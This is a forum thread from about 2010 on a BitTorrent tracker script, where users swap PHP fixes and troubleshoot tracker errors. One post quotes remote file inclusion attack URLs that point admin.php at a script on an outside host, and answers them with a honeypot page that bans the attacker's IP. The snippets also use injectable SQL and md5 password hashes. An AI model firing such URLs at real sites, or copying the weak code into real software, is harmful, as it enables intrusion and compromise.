Bravo List
Register
Go Back   > Bravo List > P2P > Forum > Downloads
Reply
  #1  
Old 3rd April 2010, 20:45
hellix's Avatar
hellix hellix is offline
Senior Member
 
Join Date: Oct 2008
Lithuania
Posts: 20
Smile Netvision 3
Updated 2010.04.29
Attached Files
File Type: rar Nv3.10.04.29.rar (9.37 MB, 269 views)

Last edited by hellix; 21st September 2010 at 11:40.
Reply With Quote
The Following 9 Users Say Thank You to hellix For This Useful Post:
aMiGo1972 (3rd April 2010), BEST (4th April 2010), danny78 (6th July 2011), duisburg (30th December 2010), Fynnon (31st August 2010), kabumski (3rd January 2011), nicukent (4th April 2010), sammygo (5th April 2010), wirt (29th June 2010)
  #2  
Old 3rd April 2010, 21:15
sammygo sammygo is offline
Senior Member
 
Join Date: May 2008
P2P
Posts: 141
Default
In global.php
after

Code:
function get_torrent_limits($userinfo)
{
    $limit = array("seeds" => -1, "leeches" => -1, "total" => -1);
put

Code:
 if (get_user_class() < UC_POWER_USER)
Now when you are Power User or + you have 0/infinite , seeding,leeching,total !

Last edited by sammygo; 4th April 2010 at 11:51.
Reply With Quote
The Following 2 Users Say Thank You to sammygo For This Useful Post:
hellix (4th April 2010), YsE (6th April 2010)
  #3  
Old 4th April 2010, 11:27
benjaminbih benjaminbih is offline
Senior Member
 
Join Date: Jul 2008
Bosnia-Herzegovina
Posts: 70
Default
Very nice!

@hellix do you have a list of included mods?

ANd i think you need to workarround the httpauth() function to make it work with both php as apache module and php as mod_fastcgi with SuExec.
Otherwize there is no chance to login in to AdminCP if you use mod_fastcgi.

This works with suexec and php as mod_fast_cgi

Make .htaccess in root folder:
PHP Code:
<IfModule mod_rewrite.c>
RewriteEngine on
RewriteRule 
.* - [E=REMOTE_USER:%{HTTP:Authorization},L]
</
IfModule>
ErrorDocument 404 /404.php 
and change in /include/security_functions.php the function httpatuh() to this:
PHP Code:
function httpauth(){
global 
$CURUSER,$lang;

  if(isset(
$_SERVER['REDIRECT_REMOTE_USER'])) {
  
$auth_params explode(":" base64_decode(substr($_SERVER['REDIRECT_REMOTE_USER'], 6)));
  
$_SERVER['PHP_AUTH_USER'] = $auth_params[0];
  unset(
$auth_params[0]);
  
$_SERVER['PHP_AUTH_PW'] = implode('',$auth_params);
}

  if (
$CURUSER['passhash'] != md5($CURUSER['secret'].$_SERVER["PHP_AUTH_PW"].$CURUSER['secret'])) {
 
header("WWW-Authenticate: Basic realm=\"Login and Password\"");
    
header("HTTP/1.0 401 Unauthorized");
    
stderr("Error""Permission denied");

    }



Last edited by benjaminbih; 4th April 2010 at 13:12.
Reply With Quote
The Following User Says Thank You to benjaminbih For This Useful Post:
hellix (4th April 2010)
  #4  
Old 4th April 2010, 13:11
hellix's Avatar
hellix hellix is offline
Senior Member
 
Join Date: Oct 2008
Lithuania
Posts: 20
Default
joke addon like

Code:
admin.php?rootpath=http://www.luomoeillegno.com/extras/idxx.txt??    
/%20%20/admin.php?rootpath=http://www.luomoeillegno.com/extras/idxx.txt??
new file admin.php or admincp.php or...............

PHP Code:
<?
require_once("include/bittorrent.php");
dbconn();
$ip ip2long(htmlspecialchars($_SERVER['REMOTE_ADDR']));
$added =get_date_time();
$addedby "1";
$comment "Admin panel attack";
$sql "INSERT INTO ban (added, addedby, ip, comment) VALUES ('$added','$addedby','$ip','$comment')";
$result mysql_query($sql);
header("Location: $BASEURL/index.php");
?>

Last edited by hellix; 28th April 2010 at 22:13.
Reply With Quote
The Following 3 Users Say Thank You to hellix For This Useful Post:
Fynnon (27th June 2010), mymihai (5th April 2010), YsE (6th April 2010)
  #5  
Old 26th June 2010, 22:52
Zuby's Avatar
Zuby Zuby is offline
Senior Member
 
Join Date: Sep 2009
P2P
Posts: 101
Default
for me .. after i've uploaded the torrent it's sending "Tracker sending invalid data:"
i havent make any changes...only install and delete restrictions for mail.
it seems that the problem is here
->
Code:
 $res = mysql_query("SELECT id, added, banned, free, seeders + leechers AS numpeers, UNIX_TIMESTAMP(added) AS ts FROM torrents WHERE " . hash_where("info_hash", $info_hash));
if someone have a good announce please post it ..

Last edited by Zuby; 27th June 2010 at 00:02.
Reply With Quote
  #6  
Old 27th June 2010, 09:42
crztz crztz is offline
Senior Member
 
Join Date: Apr 2009
P2P
Posts: 34
Default re
i removed the external part for announce for external torrents and is ok
Reply With Quote
  #7  
Old 27th June 2010, 10:20
Zuby's Avatar
Zuby Zuby is offline
Senior Member
 
Join Date: Sep 2009
P2P
Posts: 101
Default
yes .. sure, and wich is that part .. i was looking for but with no result
Reply With Quote
  #8  
Old 27th June 2010, 10:36
crztz crztz is offline
Senior Member
 
Join Date: Apr 2009
P2P
Posts: 34
Default
first of all, set OFF on using external torrents.. and try again..
Reply With Quote
  #9  
Old 27th June 2010, 13:27
Zuby's Avatar
Zuby Zuby is offline
Senior Member
 
Join Date: Sep 2009
P2P
Posts: 101
Default
fixed that with external torrents but now another one, same in announce.php

Torrent is not aware of the Tracker

i suppose is for here
Code:
$res = mysql_query("SELECT id, name, category, banned, free, activated, seeders + leechers AS numpeers, UNIX_TIMESTAMP(added) AS ts FROM torrents WHERE " . hash_where("info_hash", $info_hash));

$torrent = mysql_fetch_assoc($res);
if (!$torrent)
    err("This torrent is not aware of the Tracker");

if ($torrent["activated"] != "yes")
    err("This torrent is not aware of the Tracker");
* Thanks if u can help me

Last edited by Zuby; 27th June 2010 at 20:08.
Reply With Quote
  #10  
Old 31st August 2010, 21:45
prettor prettor is offline
Member
 
Join Date: Aug 2010
P2P
Posts: 2
Default yahoo, google and msn mail banned
hi guys, aa...i think i have a little problemmmmmmmmmmmmm

yahoo, google and msn mail are banned, but in rest, another mails work greate, can somebody help me?
Reply With Quote
Reply

Tags
netvision

Thread Tools

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is On
HTML code is Off

Forum Jump

Similar Threads
Thread Thread Starter Forum Replies Last Post
IPBTracker 3.0 Beta 1 Fynnon Downloads 2 17th December 2011 18:49
Beta gone? codedash Free Torrent Source 3 29th March 2009 15:22
FTS 1.0.3 Pre-Beta fr33bh Downloads 14 16th March 2009 20:26
FTS v2.0 BETA Dragan3591 Downloads 21 8th March 2009 09:33



All times are GMT +2. The time now is 19:18. vBulletin skin by ForumMonkeys. Powered by vBulletin® Version 3.8.11 Beta 3
Copyright ©2000 - 2024, vBulletin Solutions Inc.